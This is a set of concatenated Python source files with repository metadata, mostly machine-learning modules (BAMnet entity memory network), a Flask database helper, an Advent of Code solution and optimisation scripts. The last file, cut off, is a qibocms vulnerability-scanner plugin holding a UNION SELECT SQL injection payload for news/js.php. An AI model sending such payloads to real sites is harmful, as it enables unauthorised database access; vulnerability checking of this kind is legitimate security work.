super(Embedding, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.variational = variational
self.prior_std = prior_std
self.reset_parameters()
def reset_parameters(self):
with torch.no_grad():
t = 1. / (self.n_tokens ** (1 / 2))
W = truncnorm.rvs(-t, t, size=[self.n_tokens, self.emb_dim])
if self.variational:
mu = W
logvar = np.log(self.prior_std * np.ones_like(W))
W = np.concatenate((mu, logvar), axis=1)
self.W = Parameter(tensor(W).float())
def reparameterize(self, mean, logvar):
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return mean + std * eps
else:
return mean
def forward(self, x):
x = F.embedding(x, self.W)
if self.variational:
mu = x[..., :self.emb_dim]
logvar = x[..., self.emb_dim:]
x = self.reparameterize(mu, logvar)
return x, mu, logvar
else:
return x
class Aggregator(nn.Module):
def __init__(self, n_tokens, emb_dim,
T=48.0):
"""
Embedding aggregation class based in equal time intervals
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
Dimensionality embedding space
T : float, optional
Total period of time
"""
super(Aggregator, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.T = T
self.device = get_device()
self.embed = Embedding(n_tokens, emb_dim,
variational=False)
def forward(self, X):
T = X[:, :, 0]
X = X[:, :, 1]
T_mask = T < self.T
n = T_mask.sum(dim=1).max()
T = T[:, :n]
X = X[:, :n].long()
emb = self.embed(X)
out = []
for t in torch.arange(0, self.T, self.T/48, dtype=torch.float32).to(self.device):
t_idx = ((t <= T) & (T < (t+self.T/48))).float().unsqueeze(2)
X_t = t_idx * emb
X_t = X_t.sum(dim=1, keepdim=True)
out += [X_t]
return torch.cat(out, dim=1)
class VariationalAggregator(nn.Module):
def __init__(self, n_tokens, emb_dim,
T=48):
"""
Embedding class with built-in variational option.
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
Dimensionality embedding space
T : float, optional
Total period of time
"""
super(VariationalAggregator, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.T = T
self.device = get_device()
self.embed = Embedding(n_tokens, emb_dim,
variational=True)
def forward(self, X):
T = X[:, :, 0]
X = X[:, :, 1]
T_mask = T < self.T
n = T_mask.sum(dim=1).max()
X = X[:, :n].long()
emb, mu, logvar = self.embed(X)
# KL divergence from p(z)~N(0,I) loss component
kl_loss = _kl_normal_loss(mu, logvar)
# Entropy of multivariate normal distribution:
H = 0.5 * (self.emb_dim + self.emb_dim * torch.log(2 * pi) + logvar.sum(dim=2))
H = H * T_mask[:, :n].float()
H_cum = H.cumsum(dim=1)
H_cum = H_cum / H_cum.max(dim=1, keepdim=True)[0]
out = []
for h in torch.arange(0, 1., 1./48, dtype=torch.float32).to(self.device):
h_idx = ((h <= H_cum) & (H_cum < (h+1./48))).float().unsqueeze(2)
X_h = h_idx * emb
X_h_sum = X_h.sum(dim=1, keepdim=True)
out += [X_h_sum]
return torch.cat(out, dim=1), kl_loss
class Net(nn.Module):
def __init__(self, n_tokens, emb_dim, rnn_dim,
T=48.0,
variational=False,
layer_norm=False):
"""
Class defining network structure.
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
Dimensionality embedding space
rnn_dim : int
Dimensionality of rnn space
T : float, optional
Total period of time
variational : bool, optional
Whether to use a variational embedding
layer_norm : bool, optional
Whether to use layer normalisation in the LSTM unit
"""
super(Net, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.rnn_dim = rnn_dim
self.T = T
self.variational = variational
self.layer_norm = layer_norm
if self.variational:
self.embedding = VariationalAggregator(n_tokens, emb_dim, T=T)
else:
self.embedding = Aggregator(n_tokens, emb_dim, T=T)
self.lstm = LSTM(emb_dim, rnn_dim, layer_norm=layer_norm)
self.fc = nn.Linear(rnn_dim, 1)
def forward(self, x):
emb = self.embedding(x)
all_hidden, (final_hidden, _) = self.lstm(emb)
output = self.fc(all_hidden).squeeze()
return output.sigmoid()
def _kl_normal_loss(mean, logvar):
"""
Calculates the KL divergence between a normal distribution
with diagonal covariance and a unit normal distribution.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (batch_size, latent_dim) where
D is dimension of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (batch_size,
latent_dim)
"""
latent_dim = mean.size(1)
# batch mean of kl for each latent dimension
latent_kl = 0.5 * (-1 - logvar + mean.pow(2) + logvar.exp()).mean(dim=0)
total_kl = latent_kl.sum()
return total_kl
| 27.53937
| 89
| 0.551108
|
a57a80f93dd8f40618eec2970a25c217a7264d8b
| 44
|
py
|
Python
|
source/pyzzle/recon/__init__.py
|
blackslender/x
|
5bd6b36fe01af7ecb1506e7f8e90ebc69b31780d
|
[
"MIT"
] | null | null | null |
source/pyzzle/recon/__init__.py
|
blackslender/x
|
5bd6b36fe01af7ecb1506e7f8e90ebc69b31780d
|
[
"MIT"
] | null | null | null |
source/pyzzle/recon/__init__.py
|
blackslender/x
|
5bd6b36fe01af7ecb1506e7f8e90ebc69b31780d
|
[
"MIT"
] | null | null | null |
from .recon import init_recon_job, ReconJob
| 22
| 43
| 0.840909
|
28f34718b303b8e2eb1591dd3a0693cbcde10a59
| 810
|
py
|
Python
|
db.py
|
kamwithak/learn-complexity.herokuapp.com
|
b6db945553016dfe95cb35afda37abb90a298fd4
|
[
"MIT"
] | null | null | null |
db.py
|
kamwithak/learn-complexity.herokuapp.com
|
b6db945553016dfe95cb35afda37abb90a298fd4
|
[
"MIT"
] | null | null | null |
db.py
|
kamwithak/learn-complexity.herokuapp.com
|
b6db945553016dfe95cb35afda37abb90a298fd4
|
[
"MIT"
] | null | null | null |
import sqlite3
import click
from flask import current_app, g
from flask.cli import with_appcontext
def get_db():
if "db" not in g:
g.db = sqlite3.connect(
"sqlite_db", detect_types=sqlite3.PARSE_DECLTYPES
)
g.db.row_factory = sqlite3.Row
return g.db
def close_db(e=None):
db = g.pop("db", None)
if db is not None:
db.close()
def init_db():
db = get_db()
with current_app.open_resource("schema.sql") as f:
db.executescript(f.read().decode("utf8"))
@click.command("init-db")
@with_appcontext
def init_db_command():
"""Clear the existing data and create new tables."""
init_db()
click.echo("Initialized the database.")
def init_app(app):
app.teardown_appcontext(close_db)
app.cli.add_command(init_db_command)
| 21.891892
| 61
| 0.660494
|
2c14c7da4e954f22f53925a63fd27b60f942ace3
| 3,066
|
py
|
Python
|
y2018/day04/day04.py
|
ammarnajjar/adventofcode
|
d8c6416cdad9ca4a254c4888422fa3ce29524685
|
[
"MIT"
] | null | null | null |
y2018/day04/day04.py
|
ammarnajjar/adventofcode
|
d8c6416cdad9ca4a254c4888422fa3ce29524685
|
[
"MIT"
] | 7
|
2019-11-20T10:04:49.000Z
|
2022-03-18T00:19:12.000Z
|
y2018/day04/day04.py
|
ammarnajjar/adventofcode
|
d8c6416cdad9ca4a254c4888422fa3ce29524685
|
[
"MIT"
] | null | null | null |
import os
from collections import defaultdict
from datetime import datetime
from typing import Dict
from typing import List
from typing import Tuple
def order_chronologically(data_list: List[str]) -> List[str]:
return sorted(
data_list,
key=lambda x: datetime.strptime(x[1:17], '%Y-%m-%d %H:%M'),
)
SleepingMap = Tuple[
Dict[int, int],
Dict[
int,
List[Tuple[int, int]],
],
]
SpanType = Dict[
int,
List[Tuple[int, int]],
]
def sleeping_map(sorted_data_list: List[str]) -> SleepingMap:
minutes: Dict[int, int] = {}
spans: SpanType = defaultdict(list)
for entry in sorted_data_list:
if 'Guard' in entry:
guard_id = int(entry.split('#')[1].split()[0])
if 'falls' in entry:
start_sleeping = datetime.strptime(entry[1:17], '%Y-%m-%d %H:%M')
if 'wakes' in entry:
end_sleeping = datetime.strptime(entry[1:17], '%Y-%m-%d %H:%M')
minutes.update({
guard_id: minutes.get(guard_id, 0) + (
end_sleeping - start_sleeping
).seconds // 60,
})
spans[guard_id].append(
(start_sleeping.minute, end_sleeping.minute),
)
return minutes, dict(spans)
def key_with_max_value(minutes: Dict[int, int]) -> int:
sorted_list_of_tuples = sorted(
minutes.items(),
key=lambda x: x[1],
reverse=True,
)
return sorted_list_of_tuples[0][0]
def minute_most_asleep(spans: List[Tuple[int, int]]) -> Tuple[int, int]:
rank = {m: 0 for m in range(60)}
for m in range(60):
for span in spans:
if m in range(*span):
rank[m] += 1
minute = key_with_max_value(rank)
frequency = rank[minute]
return minute, frequency
def choose_guard(input_data: str) -> int:
data_list = input_data.strip().split('\n')
actions_in_order = order_chronologically(data_list)
minutes, spans = sleeping_map(actions_in_order)
chosen_guard = key_with_max_value(minutes)
chosen_minute, _ = minute_most_asleep(spans[chosen_guard])
return chosen_guard * chosen_minute
def guard_freq_alseep(input_data: str) -> int:
data_list = input_data.strip().split('\n')
actions_in_order = order_chronologically(data_list)
minutes, spans = sleeping_map(actions_in_order)
guard_freq = {}
freq_minute = {}
for k, span_list in spans.items():
m, f = minute_most_asleep(span_list)
guard_freq.update({k: f})
freq_minute.update({f: m})
chosen_guard = key_with_max_value(guard_freq)
chosen_minute = freq_minute[guard_freq[chosen_guard]]
return chosen_guard * chosen_minute
if __name__ == '__main__': # pragma no cover
current_path = os.path.dirname(os.path.realpath(__file__))
with open(f'{current_path}/input04', 'r') as input_file:
input_text = input_file.read()
print(f'Chosen guard = {choose_guard(input_text)}')
print(f'Guard frequent sleep minute = {guard_freq_alseep(input_text)}')
| 30.66
| 79
| 0.632094
|
ab32be4d92578608d6f0a15a7632f037b3f2fc2d
| 3,374
|
py
|
Python
|
src/Atlas/heli_opt_complex.py
|
swryan/Atlas
|
c5e8800d326d6442ceb4d0ab7910bbbda2ce4838
|
[
"Apache-2.0"
] | null | null | null |
src/Atlas/heli_opt_complex.py
|
swryan/Atlas
|
c5e8800d326d6442ceb4d0ab7910bbbda2ce4838
|
[
"Apache-2.0"
] | null | null | null |
src/Atlas/heli_opt_complex.py
|
swryan/Atlas
|
c5e8800d326d6442ceb4d0ab7910bbbda2ce4838
|
[
"Apache-2.0"
] | null | null | null |
from openmdao.main.api import Assembly, set_as_top
from openmdao.lib.datatypes.api import Float
from openmdao.lib.drivers.api import SLSQPdriver
try:
from pyopt_driver import pyopt_driver
except ImportError:
pyopt_driver = None
from openmdao.util.log import enable_trace # , disable_trace
from numpy import pi
from Atlas import AtlasConfiguration, AeroStructural
class ConfigOpt(AtlasConfiguration):
""" Atlas configuration for single point optimization """
# inputs for optimizer
Omega_opt = Float(iotype='in', desc='rotor angular velocity')
def execute(self):
super(ConfigOpt, self).execute()
# use optimizer provided value for Omega
self.Omega = self.Omega_opt
class AeroStructuralOpt(AeroStructural):
""" AeroStructural assembly for single point optimization """
def configure(self):
super(AeroStructuralOpt, self).configure()
# replace config with optimizer driven config
self.replace('config', ConfigOpt())
# create passthroughs for variables used by the optimizer
self.create_passthrough('config.Omega_opt')
self.create_passthrough('struc.Mtot')
self.create_passthrough('results.Ttot')
self.create_passthrough('results.Ptot')
class HeliOpt(Assembly):
""" Single point aero-structural optimization """
def configure(self):
# add an optimizer and an AeroStructural assembly
if pyopt_driver and 'SNOPT' in pyopt_driver._check_imports():
self.add("driver", pyopt_driver.pyOptDriver())
self.driver.optimizer = "SNOPT"
self.driver.options = {
# any changes to default SNOPT options?
}
else:
print 'SNOPT not available, using SLSQP'
self.add('driver', SLSQPdriver())
self.add('aso', AeroStructuralOpt())
# objective: minimize total power
self.driver.add_objective('aso.Ptot')
# parameter: rotor speed
self.driver.add_parameter('aso.Omega_opt',
low=0.15*2*pi, high=0.25*2*pi)
self.aso.Omega_opt = 0.2*2*pi # initial value
# constraint: lift >= weight
self.driver.add_constraint('aso.Mtot*9.8-aso.Ttot<=0')
# TODO: optional constraints
#
# if flags.ConFail:
# Structural Failure in Rotor Spar (ConFail)
# Buckling failure of spar (ConFailBuck)
# Tensile failure in wire (ConFailWire)
#
# if flags.ConDef:
# Constraints on Maximum Deformation (ConDelta)
if __name__ == '__main__':
opt = set_as_top(HeliOpt())
opt.driver.gradient_options.force_fd = True
opt.driver.gradient_options.fd_step = 1e-3
opt.driver.gradient_options.fd_form = "complex_step"
#opt.aso.Omega_opt = 1.0512
#opt.driver.run_iteration()
print 'Parameter: Omega =', opt.aso.config.Omega
print 'Constraint: Weight-Lift =', (opt.aso.Mtot*9.8-opt.aso.Ttot)
print 'Objective: Ptot =', opt.aso.Ptot
# enable_trace()
#exit()
opt.run()
print 'Parameter: Omega =', opt.aso.config.Omega
print 'Constraint: Weight-Lift =', (opt.aso.Mtot*9.8-opt.aso.Ttot)
print 'Objective: Ptot =', opt.aso.Ptot
# for reference, MATLAB solution:
# Omega: 1.0512
# Ptot: 421.3185
| 29.596491
| 70
| 0.645821
|
98d06a5c783c7c3ae6a4de2c0c452b279dffb9aa
| 804
|
py
|
Python
|
netbeans/assignee/total_bugs.py
|
imlegend19/MDSN-DevRank
|
bb1b71f72d2fb97044a62e8e0152dadb88de6411
|
[
"MIT"
] | null | null | null |
netbeans/assignee/total_bugs.py
|
imlegend19/MDSN-DevRank
|
bb1b71f72d2fb97044a62e8e0152dadb88de6411
|
[
"MIT"
] | null | null | null |
netbeans/assignee/total_bugs.py
|
imlegend19/MDSN-DevRank
|
bb1b71f72d2fb97044a62e8e0152dadb88de6411
|
[
"MIT"
] | null | null | null |
import pickle
from local_settings_netbeans import db
with db:
cur = db.cursor()
cur.execute(
"SELECT DISTINCT assigned_to FROM test_bugs_fixed_closed "
"WHERE assigned_to IN (SELECT who FROM test_longdescs_fixed_closed) and year(creation_ts) between 2002 and 2005")
assignees = []
for i in cur.fetchall():
assignees.append(i[0])
cur.execute("select assigned_to, count(distinct bug_id) from test_bugs_fixed_closed where year(creation_ts) between 2002 and 2005 group by assigned_to")
assignee_bugs = {}
for i in cur.fetchall():
if i[0] in assignees:
assignee_bugs[i[0]] = i[1]
print(assignee_bugs)
with open("assignee_total_bugs.txt", 'wb') as fp:
pickle.dump(assignee_bugs, fp)
print("Process Finished!")
| 28.714286
| 156
| 0.685323
|
6155a812936aaa5ac0d2d7e9cd44ac93367b3481
| 4,592
|
py
|
Python
|
meta.py
|
Maxence-Labesse/MLKit
|
7f8d92b5d3e025dc3719c3bbaf1f2e55afda5107
|
[
"MIT"
] | 1
|
2022-01-11T14:13:22.000Z
|
2022-01-11T14:13:22.000Z
|
meta.py
|
Maxence-Labesse/MLKit
|
7f8d92b5d3e025dc3719c3bbaf1f2e55afda5107
|
[
"MIT"
] | null | null | null |
meta.py
|
Maxence-Labesse/MLKit
|
7f8d92b5d3e025dc3719c3bbaf1f2e55afda5107
|
[
"MIT"
] | 1
|
2020-07-10T09:51:22.000Z
|
2020-07-10T09:51:22.000Z
|
# Import
from time import time
from datetime import date
from AutoMxL import *
import pandas as pd
from AutoMxL.Utils.Display import print_title1, print_dict
from AutoMxL.Utils.Utils import random_from_dict
from data.data_config import d_files
from AutoMxL.param_config import n_epoch, learning_rate, batch_size, crit, optim
"""
AutoML test meta algo :
- Apply AutoML on multiple datasets with random tuning
- Store datasets informations, AutoML parameters and modelisation perfs in meta.csv
"""
# Meta config #
###############
d_all_param = dict()
# number of datasets over datasets
n_iter = 1
# number of model iterations for each dataset
model_iter = 5
# date reference for date transformation (timedelta
today_date = date.today().strftime("%d/%m/%Y")
# AutoML param #
################
# outliers processing
d_all_param['outliers'] = [True, False]
# available models
d_all_param['clf'] = ['RF', 'XGBOOST']
# features selection
d_all_param['select_method'] = ['pca', None]
# categorical encoding method
d_all_param['cat_method'] = ['deep_encoder', 'one_hot']
# bagging use for modelisation
d_all_param['bagging'] = [True, False]
start_meta = time()
# Extend existing storing file meta.csv
# df_meta = pd.read_csv('meta.csv', sep=",")
# Create new storing file meta.csv
df_meta = pd.DataFrame(
columns=['file_name', 'date', 'exec_time', 'nrow', 'ncol', 'nnum', 'ncat', 'ndate', 'cat_method',
'n_epoch', 'learning_rate', 'batch_size', 'crit', 'optim', 'process_outliers', 'select_method', 'bagging',
'clf', 'bagging', 'n_model', 'n_valid_models', 'AUC', 'delta_auc', 'precision', 'recall', 'F1'])
#############
# Meta Algo #
#############
for i in range(n_iter):
for file in [file for file in d_files.keys()]:
# import
df_raw = import_data(file, verbose=False)
# print
print_title1(file + " / niter : " + str(i))
print("\nTaille du dataset brut", df_raw.shape)
before = time()
# pick random parameters from d_all_param
d_param = random_from_dict(d_all_param, verbose=True)
# encode target
new_df, target = category_to_target(df_raw, var=d_files[file]['var'], cat=d_files[file]['cat'])
# instantiate AML object
auto_df = AML(new_df.copy(), target=target)
# explore
auto_df.explore(verbose=False)
print_dict(auto_df.d_features)
# preprocess
auto_df.preprocess(process_outliers=d_param['outliers'], cat_method=d_param['cat_method'], verbose=False)
# select features
if d_param['select_method'] is not None:
auto_df.select_features(method=d_param['select_method'], verbose=False)
print("Taille du dataset avant modele :", auto_df.shape)
# random search
res_dict, l_valid_models, best_model_index, df_test = auto_df.model_train_test(clf=d_param['clf'],
top_bagging=d_param['bagging'],
n_comb=model_iter,
comb_seed=None, verbose=True)
# if a best model is found, store metrics, else store -1
if best_model_index is not None:
HP = res_dict[best_model_index]['metrics']
df_meta = df_meta.append(
{'file_name': file, 'date': today_date, 'exec_time': str(round(time() - before, 4)),
'nrow': df_raw.shape[0], 'ncol': df_raw.shape[1], 'nnum': len(auto_df.d_features['numerical']),
'ncat': len(auto_df.d_features['categorical']), 'ndate': len(auto_df.d_features['date']),
'cat_method': d_param['cat_method'], 'n_epoch': n_epoch, 'learning_rate': learning_rate,
'batch_size': batch_size, 'crit': crit, 'optim': optim,
'process_outliers': str(d_param['outliers']), 'select_method': str(d_param['select_method']),
'clf': d_param['clf'], 'bagging': d_param['bagging'], 'n_model': model_iter,
'n_valid_models': len(l_valid_models), 'AUC': HP['Roc_auc'] if HP else -1,
'delta_auc': HP['delta_auc'] if HP else -1, 'precision': HP['Precision'] if HP else -1,
'recall': HP['Recall'] if HP else -1, 'F1': HP['F1'] if HP else -1
}, ignore_index=True)
# store models results
df_meta.to_csv('meta.csv', index=False)
stop_meta = time()
print(str(round(stop_meta - start_meta, 4)))
| 40.280702
| 119
| 0.609538
|
b4704990b1c826d80f70149ea10bb6e92b530ce0
| 11,193
|
py
|
Python
|
src/core/bamnet/ent_modules.py
|
siyangZhao/BAMnet
|
4c6222610c120a4a114daf40938219ea0ca57dc6
|
[
"Apache-2.0"
] | 170
|
2019-03-06T16:08:22.000Z
|
2022-03-16T09:09:31.000Z
|
src/core/bamnet/ent_modules.py
|
YL1113/BAMnet
|
2f73e1c96dbc1643f1b37e3b5589ee8d9916a8e3
|
[
"Apache-2.0"
] | 11
|
2019-05-24T06:19:03.000Z
|
2021-11-26T19:08:34.000Z
|
src/core/bamnet/ent_modules.py
|
YL1113/BAMnet
|
2f73e1c96dbc1643f1b37e3b5589ee8d9916a8e3
|
[
"Apache-2.0"
] | 37
|
2019-06-03T02:49:15.000Z
|
2021-12-03T17:55:03.000Z
|
'''
Created on Sep, 2018
@author: hugo
'''
import numpy as np
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence
import torch.nn.functional as F
from .modules import SeqEncoder, SelfAttention_CoAtt, Attention
from .utils import to_cuda
INF = 1e20
VERY_SMALL_NUMBER = 1e-10
class Entnet(nn.Module):
def __init__(self, vocab_size, vocab_embed_size, o_embed_size, \
hidden_size, num_ent_types, num_relations, \
seq_enc_type='cnn', \
word_emb_dropout=None, \
que_enc_dropout=None,\
ent_enc_dropout=None, \
pre_w2v=None, \
num_hops=1, \
att='add', \
use_cuda=True):
super(Entnet, self).__init__()
self.use_cuda = use_cuda
self.seq_enc_type = seq_enc_type
self.que_enc_dropout = que_enc_dropout
self.ent_enc_dropout = ent_enc_dropout
self.num_hops = num_hops
self.hidden_size = hidden_size
self.que_enc = SeqEncoder(vocab_size, vocab_embed_size, hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[2, 3], \
init_word_embed=pre_w2v, \
use_cuda=use_cuda).que_enc
self.ent_enc = EntEncoder(o_embed_size, hidden_size, \
num_ent_types, num_relations, \
vocab_size=vocab_size, \
vocab_embed_size=vocab_embed_size, \
shared_embed=self.que_enc.embed, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
ent_enc_dropout=ent_enc_dropout, \
use_cuda=use_cuda)
self.batchnorm = nn.BatchNorm1d(hidden_size)
if seq_enc_type in ('lstm', 'gru'):
self.self_atten = SelfAttention_CoAtt(hidden_size)
print('[ Using self-attention on question encoder ]')
self.ent_memory_hop = EntRomHop(hidden_size, hidden_size, hidden_size, atten_type=att)
print('[ Using {}-hop entity memory update ]'.format(num_hops))
def forward(self, memories, queries, query_lengths):
x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask = memories
x_rel_mask = self.create_mask_3D(x_rel_mask, x_rels.size(-1), use_cuda=self.use_cuda)
# Question encoder
if self.seq_enc_type in ('lstm', 'gru'):
Q_r = self.que_enc(queries, query_lengths)[0]
if self.que_enc_dropout:
Q_r = F.dropout(Q_r, p=self.que_enc_dropout, training=self.training)
query_mask = self.create_mask(query_lengths, Q_r.size(1), self.use_cuda)
q_r = self.self_atten(Q_r, query_lengths, query_mask)
else:
q_r = self.que_enc(queries, query_lengths)[1]
if self.que_enc_dropout:
q_r = F.dropout(q_r, p=self.que_enc_dropout, training=self.training)
# Entity encoder
ent_val, ent_key = self.ent_enc(x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask)
ent_val = torch.cat([each.unsqueeze(2) for each in ent_val], 2)
ent_key = torch.cat([each.unsqueeze(2) for each in ent_key], 2)
ent_val = torch.sum(ent_val, 2)
ent_key = torch.sum(ent_key, 2)
mem_hop_scores = []
mid_score = self.clf_score(q_r, ent_key)
mem_hop_scores.append(mid_score)
for _ in range(self.num_hops):
q_r = q_r + self.ent_memory_hop(q_r, ent_key, ent_val)
q_r = self.batchnorm(q_r)
mid_score = self.clf_score(q_r, ent_key)
mem_hop_scores.append(mid_score)
return mem_hop_scores
def clf_score(self, q_r, ent_key):
return torch.matmul(ent_key, q_r.unsqueeze(-1)).squeeze(-1)
def create_mask(self, x, N, use_cuda=True):
x = x.data
mask = np.zeros((x.size(0), N))
for i in range(x.size(0)):
mask[i, :x[i]] = 1
return to_cuda(torch.Tensor(mask), use_cuda)
def create_mask_3D(self, x, N, use_cuda=True):
x = x.data
mask = np.zeros((x.size(0), x.size(1), N))
for i in range(x.size(0)):
for j in range(x.size(1)):
mask[i, j, :x[i, j]] = 1
return to_cuda(torch.Tensor(mask), use_cuda)
class EntEncoder(nn.Module):
"""Entity Encoder"""
def __init__(self, o_embed_size, hidden_size, num_ent_types, num_relations, vocab_size=None, \
vocab_embed_size=None, shared_embed=None, seq_enc_type='lstm', word_emb_dropout=None, \
ent_enc_dropout=None, use_cuda=True):
super(EntEncoder, self).__init__()
# Cannot have embed and vocab_size set as None at the same time.
self.ent_enc_dropout = ent_enc_dropout
self.hidden_size = hidden_size
self.relation_embed = nn.Embedding(num_relations, o_embed_size, padding_idx=0)
self.embed = shared_embed if shared_embed is not None else nn.Embedding(vocab_size, vocab_embed_size, padding_idx=0)
self.vocab_embed_size = self.embed.weight.data.size(1)
self.linear_node_name_key = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_node_type_key = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_rels_key = nn.Linear(hidden_size + o_embed_size, hidden_size, bias=False)
self.linear_node_name_val = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_node_type_val = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_rels_val = nn.Linear(hidden_size + o_embed_size, hidden_size, bias=False)
self.kg_enc_ent = SeqEncoder(vocab_size, \
self.vocab_embed_size, \
hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[3], \
shared_embed=shared_embed, \
use_cuda=use_cuda).que_enc # entity name
self.kg_enc_type = SeqEncoder(vocab_size, \
self.vocab_embed_size, \
hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[3], \
shared_embed=shared_embed, \
use_cuda=use_cuda).que_enc # entity type name
self.kg_enc_rel = SeqEncoder(vocab_size, \
self.vocab_embed_size, \
hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[3], \
shared_embed=shared_embed, \
use_cuda=use_cuda).que_enc # relation name
def forward(self, x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask):
node_ent_names, node_type_names, node_types, edge_rel_names, edge_rels = self.enc_kg_features(x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask)
node_name_key = self.linear_node_name_key(node_ent_names)
node_type_key = self.linear_node_type_key(node_type_names)
rel_key = self.linear_rels_key(torch.cat([edge_rel_names, edge_rels], -1))
node_name_val = self.linear_node_name_val(node_ent_names)
node_type_val = self.linear_node_type_val(node_type_names)
rel_val = self.linear_rels_val(torch.cat([edge_rel_names, edge_rels], -1))
ent_comp_val = [node_name_val, node_type_val, rel_val]
ent_comp_key = [node_name_key, node_type_key, rel_key]
return ent_comp_val, ent_comp_key
def enc_kg_features(self, x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask):
node_ent_names = (self.kg_enc_ent(x_ent_names.view(-1, x_ent_names.size(-1)), x_ent_name_len.view(-1))[1]).view(x_ent_names.size(0), x_ent_names.size(1), -1)
node_type_names = (self.kg_enc_type(x_type_names.view(-1, x_type_names.size(-1)), x_type_name_len.view(-1))[1]).view(x_type_names.size(0), x_type_names.size(1), -1)
node_types = None
edge_rel_names = torch.mean((self.kg_enc_rel(x_rel_names.view(-1, x_rel_names.size(-1)), x_rel_name_len.view(-1))[1]).view(x_rel_names.size(0), x_rel_names.size(1), x_rel_names.size(2), -1), 2)
edge_rels = torch.mean(self.relation_embed(x_rels.view(-1, x_rels.size(-1))), 1).view(x_rels.size(0), x_rels.size(1), -1)
if self.ent_enc_dropout:
node_ent_names = F.dropout(node_ent_names, p=self.ent_enc_dropout, training=self.training)
node_type_names = F.dropout(node_type_names, p=self.ent_enc_dropout, training=self.training)
# node_types = F.dropout(node_types, p=self.ent_enc_dropout, training=self.training)
edge_rel_names = F.dropout(edge_rel_names, p=self.ent_enc_dropout, training=self.training)
edge_rels = F.dropout(edge_rels, p=self.ent_enc_dropout, training=self.training)
return node_ent_names, node_type_names, node_types, edge_rel_names, edge_rels
class EntRomHop(nn.Module):
def __init__(self, query_embed_size, in_memory_embed_size, hidden_size, atten_type='add'):
super(EntRomHop, self).__init__()
self.atten = Attention(hidden_size, query_embed_size, in_memory_embed_size, atten_type=atten_type)
self.gru_step = GRUStep(hidden_size, in_memory_embed_size)
def forward(self, h_state, key_memory_embed, val_memory_embed, atten_mask=None):
attention = self.atten(h_state, key_memory_embed, atten_mask=atten_mask)
probs = torch.softmax(attention, dim=-1)
memory_output = torch.bmm(probs.unsqueeze(1), val_memory_embed).squeeze(1)
h_state = self.gru_step(h_state, memory_output)
return h_state
class GRUStep(nn.Module):
def __init__(self, hidden_size, input_size):
super(GRUStep, self).__init__()
'''GRU module'''
self.linear_z = nn.Linear(hidden_size + input_size, hidden_size, bias=False)
self.linear_r = nn.Linear(hidden_size + input_size, hidden_size, bias=False)
self.linear_t = nn.Linear(hidden_size + input_size, hidden_size, bias=False)
def forward(self, h_state, input_):
z = torch.sigmoid(self.linear_z(torch.cat([h_state, input_], -1)))
r = torch.sigmoid(self.linear_r(torch.cat([h_state, input_], -1)))
t = torch.tanh(self.linear_t(torch.cat([r * h_state, input_], -1)))
h_state = (1 - z) * h_state + z * t
return h_state
| 49.746667
| 219
| 0.642902
|
54bf56cbaa6500439e9e26a8b685b6dd52abaaad
| 1,204
|
py
|
Python
|
scanner/plugins/cms/qibocms/qibocms_js_f_id_sqli.py
|
UgOrange/onlinetools
|
06205282965395e37fb3a7fed806682196ad9ccc
|
[
"MIT"
] | 1,207
|
2018-01-31T06:36:34.000Z
|
2022-03-31T07:35:35.000Z
|
scanner/plugins/cms/qibocms/qibocms_js_f_id_sqli.py
|
UgOrange/onlinetools
|
06205282965395e37fb3a7fed806682196ad9ccc
|
[
"MIT"
] | 21
|
2018-07-30T03:01:49.000Z
|
2022-03-28T08:20:39.000Z
|
scanner/plugins/cms/qibocms/qibocms_js_f_id_sqli.py
|
UgOrange/onlinetools
|
06205282965395e37fb3a7fed806682196ad9ccc
|
[
"MIT"
] | 310
|
2018-02-22T01:23:20.000Z
|
2022-03-28T08:51:37.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: qibocms news/js.php文件参数f_idSQL注入
referer: http://www.wooyun.org/bugs/wooyun-2014-075317
author: Lucifer
description: 文件/news/js.php中,参数f_id存在SQL注入。
'''
import sys
import requests
class qibocms_js_f_id_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/news/js.php?f_id=1)%20UnIoN%20SeLeCt%201,Md5(1234),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot"
vulnurl = self.url + payload
try:
